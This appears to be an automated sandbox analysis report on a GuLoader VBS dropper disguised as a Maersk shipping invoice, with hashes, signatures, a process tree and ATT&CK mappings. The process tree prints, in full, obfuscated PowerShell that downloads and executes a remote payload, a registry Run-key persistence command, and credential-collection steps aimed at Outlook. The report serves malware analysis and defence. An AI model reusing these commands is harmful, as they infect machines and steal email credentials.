Overview

overview

10

Static

static

1

Maersk_Shi...df.vbs

windows7-x64

8

Maersk_Shi...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    108s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-07-2024 16:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs

  • Size

    22KB

  • MD5

    af8e905368962cfb4873c41a77b4515c

  • SHA1

    577337de5d106e6b11225be7c362f33a8d5c0831

  • SHA256

    bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3

  • SHA512

    8fca68d732a9db1a4a6d9b955a361a5bd37bdd7c994e9094b31799cc7c4c6448fc620d2bf8928532a261680c78e8e138f0b960d9fa630dfc0b4e51c7e756a9c2

  • SSDEEP

    384:KlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwfEa+MCq22HX:6zSR022X/523S0e8xPPmra+Mq01N

Score
10/10
guloadercollectiondownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: MapViewOfSection 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3432
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
        3⤵
          PID:4276
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4896
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
            4⤵
              PID:3632
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:396
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1336
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1532
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mijkuioseccmywwgrr"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3436
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xcodvbzlakurikksbbtjo"
                5⤵
                • Accesses Microsoft Outlook accounts
                PID:4104
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hftnwtknosmvlrgwsmfdzttjl"
                5⤵
                  PID:3088
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hftnwtknosmvlrgwsmfdzttjl"
                  5⤵
                    PID:2196
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hftnwtknosmvlrgwsmfdzttjl"
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3200
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lucceiqhoqxhzheca"
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2900
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\oohvfbbicypmcnaojjld"
                    5⤵
                      PID:3616
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\oohvfbbicypmcnaojjld"
                      5⤵
                      • Accesses Microsoft Outlook accounts
                      PID:2476
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yqungtmcqghzmtosttgwfcs"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2648
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xojp.vbs"
                      5⤵
                        PID:4716

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Initial Access

              Execution

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              2
              T1112

              Credential Access

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              2
              T1082

              Lateral Movement

              Collection

              Email Collection

              1
              T1114

              Exfiltration

              Command and Control

              Impact

              Resource Development

              Reconnaissance

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbfp2v5o.vyl.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\mijkuioseccmywwgrr
                Filesize

                4KB

                MD5

                73ddf6cd83c2ad8a2fbb2383e322ffbc

                SHA1

                05270f8bb7b5cc6ab9a61ae7453d047379089147

                SHA256

                0ef9194c6e90b23c416316fc5a15f549ee5b2472014fcd7648d72ca9a865b409

                SHA512

                714db1956faa795005b15324b9604105881d6b484fe899876fe0df85783c61a72f556a875833af8625625212503b95eea2eb353a1d98f6a7af47a3658ea5262d

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\xojp.vbs
                Filesize

                346B

                MD5

                66442ccd48f759b031f9b823384e55bc

                SHA1

                b23d081bdc9686e199bcd24aeccd77ccf4550dc6

                SHA256

                8705236d12f3890c431eef683356787b711351e8b302a2cc1fd333ecd8198355

                SHA512

                5fdb17e0e5f520bcaaab6a160655d608f8e5cefe49c6aa221b808d256294ae565e05f3f097c875ed716e8424c4c180418d7216014846d54a44948961169df245

                Download Submit
              • C:\Users\Admin\AppData\Roaming\Proskriberes.Bet
                Filesize

                467KB

                MD5

                710644f1295d73af29b91f191549635e

                SHA1

                da74950f94b693c273e3e3f95ed6366aa68a93f0

                SHA256

                5595275fb9355e5017a7033452db54826c0ef829573b16eaf4e30e32473b903b

                SHA512

                63ecd9f46403895429e53f32bf9eaa00a48abfabf215614e38754287040079688287cdf7f6ecca8236ee5f7b97d22173f27abfda0ff01e4a785b1452addabec2

                Download Submit
              • memory/396-100-0x0000000001E70000-0x000000000513A000-memory.dmp
                Filesize

                50.8MB

                Download
              • memory/396-68-0x00000000215D0000-0x00000000215E9000-memory.dmp
                Filesize

                100KB

                Download
              • memory/396-72-0x00000000215D0000-0x00000000215E9000-memory.dmp
                Filesize

                100KB

                Download
              • memory/396-71-0x00000000215D0000-0x00000000215E9000-memory.dmp
                Filesize

                100KB

                Download
              • memory/396-48-0x0000000001E70000-0x000000000513A000-memory.dmp
                Filesize

                50.8MB

                Download
              • memory/2476-88-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

                Download
              • memory/2476-90-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

                Download
              • memory/2648-92-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

                Download
              • memory/2648-91-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

                Download
              • memory/2900-82-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

                Download
              • memory/2900-83-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

                Download
              • memory/3200-60-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

                Download
              • memory/3200-64-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

                Download
              • memory/3200-65-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

                Download
              • memory/3432-51-0x00007FFA45360000-0x00007FFA45E21000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/3432-12-0x00007FFA45360000-0x00007FFA45E21000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/3432-39-0x00007FFA45360000-0x00007FFA45E21000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/3432-40-0x00007FFA45363000-0x00007FFA45365000-memory.dmp
                Filesize

                8KB

                Download
              • memory/3432-0-0x00007FFA45363000-0x00007FFA45365000-memory.dmp
                Filesize

                8KB

                Download
              • memory/3432-1-0x0000022CE77F0000-0x0000022CE7812000-memory.dmp
                Filesize

                136KB

                Download
              • memory/3432-11-0x00007FFA45360000-0x00007FFA45E21000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/3436-54-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

                Download
              • memory/3436-56-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

                Download
              • memory/3436-58-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

                Download
              • memory/4104-55-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

                Download
              • memory/4104-57-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

                Download
              • memory/4104-59-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

                Download
              • memory/4896-34-0x0000000007AC0000-0x0000000007B56000-memory.dmp
                Filesize

                600KB

                Download
              • memory/4896-19-0x0000000006190000-0x00000000061F6000-memory.dmp
                Filesize

                408KB

                Download
              • memory/4896-32-0x0000000008040000-0x00000000086BA000-memory.dmp
                Filesize

                6.5MB

                Download
              • memory/4896-31-0x0000000006830000-0x000000000687C000-memory.dmp
                Filesize

                304KB

                Download
              • memory/4896-30-0x00000000067F0000-0x000000000680E000-memory.dmp
                Filesize

                120KB

                Download
              • memory/4896-29-0x0000000006300000-0x0000000006654000-memory.dmp
                Filesize

                3.3MB

                Download
              • memory/4896-18-0x0000000006030000-0x0000000006096000-memory.dmp
                Filesize

                408KB

                Download
              • memory/4896-33-0x0000000006D80000-0x0000000006D9A000-memory.dmp
                Filesize

                104KB

                Download
              • memory/4896-17-0x0000000005830000-0x0000000005852000-memory.dmp
                Filesize

                136KB

                Download
              • memory/4896-16-0x0000000005900000-0x0000000005F28000-memory.dmp
                Filesize

                6.2MB

                Download
              • memory/4896-15-0x0000000005270000-0x00000000052A6000-memory.dmp
                Filesize

                216KB

                Download
              • memory/4896-38-0x0000000009220000-0x000000000C4EA000-memory.dmp
                Filesize

                50.8MB

                Download
              • memory/4896-35-0x0000000007A50000-0x0000000007A72000-memory.dmp
                Filesize

                136KB

                Download
              • memory/4896-36-0x0000000008C70000-0x0000000009214000-memory.dmp
                Filesize

                5.6MB

                Download